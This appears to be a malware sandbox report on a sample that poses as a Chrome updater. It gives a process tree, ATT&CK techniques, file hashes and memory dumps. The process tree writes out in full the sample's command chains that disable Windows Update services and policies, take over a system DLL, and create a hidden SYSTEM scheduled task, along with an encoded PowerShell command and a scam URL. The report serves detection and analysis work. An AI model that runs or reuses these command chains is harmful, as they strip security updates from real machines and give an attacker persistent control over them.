"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:1116

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1704

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1756

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1212

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1684

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1268

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1864

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1328

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:1724

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:840

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:336

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1984

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1332

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1604

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1852

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:552

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:680

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1096

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1864

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1808

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1380

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1992

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1708

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
PID:992

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
5⤵
- Creates scheduled task(s)
PID:860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1532

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Temp\run.bat" "
2⤵
- Drops startup file
PID:2040

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Temp\lol.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1672

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1672 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1700

C:\Windows\system32\taskeng.exe
taskeng.exe {A9DB95EA-DCD1-496F-8D2B-D2FC666DFC4D} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1636

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1600

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:680

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1060

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1032

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1708

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1616

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:844

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1824

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1408

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1028

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:324

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1732

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:1364

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1432

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1032

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:992

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1168

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1756

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:908

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1172

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1328

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1360

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:1864

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:1760

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "nniaxtfqr"
4⤵
PID:1408

C:\Windows\explorer.exe
C:\Windows\explorer.exe yaczcwmfonlx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8bcGQHQgT6vgy/6HYtv8SPnEokOLbkto/HrPVPk3hf3Z
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.3MB

MD5
baeb20fb698c26b6f053215674129767

SHA1
5eb9614a66b13b71841c8fbe7e770b17ceb3c964

SHA256
99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

SHA512
a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.3MB

MD5
baeb20fb698c26b6f053215674129767

SHA1
5eb9614a66b13b71841c8fbe7e770b17ceb3c964

SHA256
99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

SHA512
a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
60KB

MD5
589c442fc7a0c70dca927115a700d41e

SHA1
66a07dace3afbfd1aa07a47e6875beab62c4bb31

SHA256
2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

SHA512
1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
340B

MD5
368cd78435874a2fa2badb3073c83271

SHA1
e158a677a558223d44bf74fd71317319d1a99a02

SHA256
3a856cf0236dfdabc08bd366d03f35847c5ee1f67147269f4dd8e446b232009d

SHA512
8ecade4b7eb9f893c3c15d60a3bd8951e6d043b9b505bd34266035d855bfa5c9c47d57e7ad6c9f8729cc128b599ebf0ed1417eef2461b13b8c4498a7427d7f6a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BIJHIX5K.txt
Filesize
604B

MD5
66d559b4e4cceeebc556199bc3167de8

SHA1
dc63ef362468c34485e1b3f56af76bb09c5e187c

SHA256
01ddbfd33033bf869f5f3f0a9ff5ad7ecb1594710d218aa3eeeccfd397693973

SHA512
802e96490c4f2f10bf7f15137a7bd9b9ad936feb0a2d4ecc779c27f499729187096d6bb5e7e9df88ab5164d647d4923fe9569b802cacc69408426d67a56e7152

Download Submit
C:\Windows\Temp\lol.bat
Filesize
59B

MD5
f580e0e80cc87b25e38ea2c0c8059d04

SHA1
299f51dca9c609d6da86f93c424e39c1e6ba0d94

SHA256
9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

SHA512
5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

Download Submit
C:\Windows\Temp\run.bat
Filesize
98B

MD5
731afe244b2414169a5f630d52646e56

SHA1
e3771ccdccd8c306ee5fc4f264cfc3310690458c

SHA256
6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

SHA512
84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

Download Submit
C:\Windows\Temp\setup.exe
Filesize
7.3MB

MD5
baeb20fb698c26b6f053215674129767

SHA1
5eb9614a66b13b71841c8fbe7e770b17ceb3c964

SHA256
99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

SHA512
a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

Download Submit
C:\Windows\Temp\setup.exe
Filesize
7.3MB

MD5
baeb20fb698c26b6f053215674129767

SHA1
5eb9614a66b13b71841c8fbe7e770b17ceb3c964

SHA256
99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

SHA512
a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
c5227366b7a688ff23b01788718251aa

SHA1
9795262e79c832ba49c744fcd1b1794c0ffb5c6a

SHA256
789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

SHA512
8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
7.3MB

MD5
baeb20fb698c26b6f053215674129767

SHA1
5eb9614a66b13b71841c8fbe7e770b17ceb3c964

SHA256
99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

SHA512
a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

Download Submit
\Windows\Temp\setup.exe
Filesize
7.3MB

MD5
baeb20fb698c26b6f053215674129767

SHA1
5eb9614a66b13b71841c8fbe7e770b17ceb3c964

SHA256
99e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0

SHA512
a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c

Download Submit
memory/324-138-0x0000000000000000-mapping.dmp

Download
memory/336-91-0x0000000000000000-mapping.dmp

Download
memory/432-126-0x0000000000000000-mapping.dmp

Download
memory/552-104-0x0000000000000000-mapping.dmp

Download
memory/680-124-0x0000000000000000-mapping.dmp

Download
memory/680-105-0x0000000000000000-mapping.dmp

Download
memory/764-119-0x000007FEEC770000-0x000007FEED2CD000-memory.dmp

Filesize
11.4MB

Download
memory/764-174-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-166-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-176-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-157-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-172-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-158-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-113-0x0000000000000000-mapping.dmp

Download
memory/764-173-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-160-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-164-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-178-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-170-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-179-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-168-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-162-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-180-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/764-167-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-181-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/764-123-0x00000000010AB000-0x00000000010CA000-memory.dmp

Filesize
124KB

Download
memory/764-122-0x00000000010A4000-0x00000000010A7000-memory.dmp

Filesize
12KB

Download
memory/840-90-0x0000000000000000-mapping.dmp

Download
memory/844-130-0x0000000000000000-mapping.dmp

Download
memory/860-97-0x0000000000000000-mapping.dmp

Download
memory/908-147-0x0000000000000000-mapping.dmp

Download
memory/948-79-0x0000000000000000-mapping.dmp

Download
memory/952-140-0x0000000000000000-mapping.dmp

Download
memory/992-144-0x0000000000000000-mapping.dmp

Download
memory/992-94-0x0000000000000000-mapping.dmp

Download
memory/1028-139-0x0000000000000000-mapping.dmp

Download
memory/1032-143-0x0000000000000000-mapping.dmp

Download
memory/1032-129-0x0000000000000000-mapping.dmp

Download
memory/1060-127-0x0000000000000000-mapping.dmp

Download
memory/1096-106-0x0000000000000000-mapping.dmp

Download
memory/1096-77-0x0000000000000000-mapping.dmp

Download
memory/1116-76-0x0000000000000000-mapping.dmp

Download
memory/1168-146-0x0000000000000000-mapping.dmp

Download
memory/1172-149-0x0000000000000000-mapping.dmp

Download
memory/1176-66-0x0000000000260000-0x000000000067E000-memory.dmp

Filesize
4.1MB

Download
memory/1176-67-0x000000001B910000-0x000000001BD2E000-memory.dmp

Filesize
4.1MB

Download
memory/1176-68-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp

Filesize
8KB

Download
memory/1212-81-0x0000000000000000-mapping.dmp

Download
memory/1268-85-0x0000000000000000-mapping.dmp

Download
memory/1328-64-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/1328-88-0x0000000000000000-mapping.dmp

Download
memory/1328-65-0x0000000000400000-0x00000000010BF000-memory.dmp

Filesize
12.7MB

Download
memory/1328-59-0x0000000000400000-0x00000000010BF000-memory.dmp

Filesize
12.7MB

Download
memory/1328-56-0x0000000000000000-mapping.dmp

Download
memory/1332-93-0x0000000000000000-mapping.dmp

Download
memory/1360-82-0x0000000000000000-mapping.dmp

Download
memory/1364-137-0x0000000000000000-mapping.dmp

Download
memory/1380-114-0x0000000000000000-mapping.dmp

Download
memory/1408-154-0x00000000002D0000-0x00000000002D6000-memory.dmp

Filesize
24KB

Download
memory/1408-152-0x00000000000A0000-0x00000000000A7000-memory.dmp

Filesize
28KB

Download
memory/1408-156-0x00000000000A0000-0x00000000000A7000-memory.dmp

Filesize
28KB

Download
memory/1408-136-0x0000000000000000-mapping.dmp

Download
memory/1432-142-0x0000000000000000-mapping.dmp

Download
memory/1532-96-0x0000000000000000-mapping.dmp

Download
memory/1600-102-0x0000000000000000-mapping.dmp

Download
memory/1600-107-0x0000000000400000-0x00000000010BF000-memory.dmp

Filesize
12.7MB

Download
memory/1600-84-0x0000000000000000-mapping.dmp

Download
memory/1600-110-0x0000000000400000-0x00000000010BF000-memory.dmp

Filesize
12.7MB

Download
memory/1600-111-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/1604-99-0x0000000000000000-mapping.dmp

Download
memory/1616-133-0x0000000000000000-mapping.dmp

Download
memory/1636-115-0x00000000010C0000-0x0000000001D7F000-memory.dmp

Filesize
12.7MB

Download
memory/1636-150-0x00000000010C0000-0x0000000001D7F000-memory.dmp

Filesize
12.7MB

Download
memory/1640-75-0x00000000026BB000-0x00000000026DA000-memory.dmp

Filesize
124KB

Download
memory/1640-73-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/1640-74-0x00000000026B4000-0x00000000026B7000-memory.dmp

Filesize
12KB

Download
memory/1640-72-0x000007FEED650000-0x000007FEEE1AD000-memory.dmp

Filesize
11.4MB

Download
memory/1640-69-0x0000000000000000-mapping.dmp

Download
memory/1680-86-0x0000000000000000-mapping.dmp

Download
memory/1684-83-0x0000000000000000-mapping.dmp

Download
memory/1704-78-0x0000000000000000-mapping.dmp

Download
memory/1704-98-0x0000000000000000-mapping.dmp

Download
memory/1708-132-0x0000000000000000-mapping.dmp

Download
memory/1708-120-0x0000000000000000-mapping.dmp

Download
memory/1724-151-0x0000000000730000-0x0000000000736000-memory.dmp

Filesize
24KB

Download
memory/1724-89-0x0000000000000000-mapping.dmp

Download
memory/1732-141-0x0000000000000000-mapping.dmp

